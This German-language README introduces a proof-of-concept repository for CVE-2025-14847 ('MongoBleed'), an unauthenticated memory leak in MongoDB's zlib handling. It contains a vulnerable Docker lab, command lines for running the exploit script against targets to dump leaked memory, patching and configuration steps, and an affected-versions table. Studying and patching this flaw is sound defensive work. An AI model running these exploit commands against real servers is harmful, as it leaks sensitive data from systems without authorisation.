
CVE-2025-14847 MongoBleed - MongoDB Speicherleck-Schwachstelle PoC
👨💻 Autor: Furkan KAYAPINAR (@FurkanKAYAPINAR)
⚠️ NUR ZU BILDUNGSZWECKEN
Laborumgebung und Exploit-Skript für die kritische, nicht authentifizierte Speicherleck-Schwachstelle in MongoDB Server.
CVE-2025-14847 (MongoBleed) ist eine kritische, nicht authentifizierte Speicherleck-Schwachstelle in der zlib-Komprimierungsverarbeitung des MongoDB-Servers.
Die Schwachstelle befindet sich in message_compressor_zlib.cpp. Bei der Verarbeitung von OP_COMPRESSED-Nachrichten:
uncompressedSize zuGeleakte Daten können Folgendes umfassen:
# Clone repository
git clone https://github.com/FurkanKAYAPINAR/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# Create virtual environment
python3 -m venv venv
source venv/bin/activate # Linux/macOS
# venv\Scripts\activate # Windows
# Install dependencies
pip install -r requirements.txt
Starten Sie eine anfällige MongoDB-Instanz zum Testen:
cd lab
# Start vulnerable MongoDB (6.0.26 with zlib enabled)
docker-compose up -d
# Verify it's running
docker-compose ps
# Load sample data (optional)
./setup.sh load-data
# Stop lab
docker-compose down
# Single target
python exploit/mongobleed.py -u 127.0.0.1
# With specific port
python exploit/mongobleed.py -u 127.0.0.1 -p 27017
# Save leaked data to file
python exploit/mongobleed.py -u 127.0.0.1 -o leaked_data.bin
# Multiple iterations for more data
python exploit/mongobleed.py -u 127.0.0.1 -i 20
# Quiet mode (less output)
python exploit/mongobleed.py -u 127.0.0.1 -q
# Without hex dump (text output)
python exploit/mongobleed.py -u 127.0.0.1 --text
# Update to patched version
# Example for MongoDB 6.x
sudo apt-get update
sudo apt-get install mongodb-org=6.0.27
# Start mongod without zlib
mongod --networkMessageCompressors snappy,zstd
# Or in mongod.conf
net:
compression:
compressors: snappy,zstd
python remediation/verify_fix.py --target 127.0.0.1 --port 27017
🚨 WARNUNG
Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.
- Unbefugter Zugriff auf Computersysteme ist illegal
- Sie sind allein für Ihre Handlungen verantwortlich
- Die Autoren übernehmen keine Haftung für Missbrauch
Durch die Nutzung dieses Tools erklären Sie sich damit einverstanden, dass Sie die entsprechende Autorisierung zum Testen der Zielsysteme haben.
Beiträge sind willkommen! Bitte lesen Sie zuerst CONTRIBUTING.md.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe Datei LICENSE.
| Attribut | Wert |
|---|
| CVE-ID | CVE-2025-14847 |
| CVSS-Score | 8.7 (Hoch) |
| Angriffsvektor | Netzwerk |
| Authentifizierung | Keine erforderlich |
| Offenlegungsdatum | 19. Dezember 2025 |
| Versionsbereich | Gepatchte Version |
|---|
| 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.0 - 7.0.26 | 7.0.28 |
| 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.0 - 4.4.29 | 4.4.30 |
| Alle 4.2, 4.0, 3.6 | EOL – Sofort aktualisieren |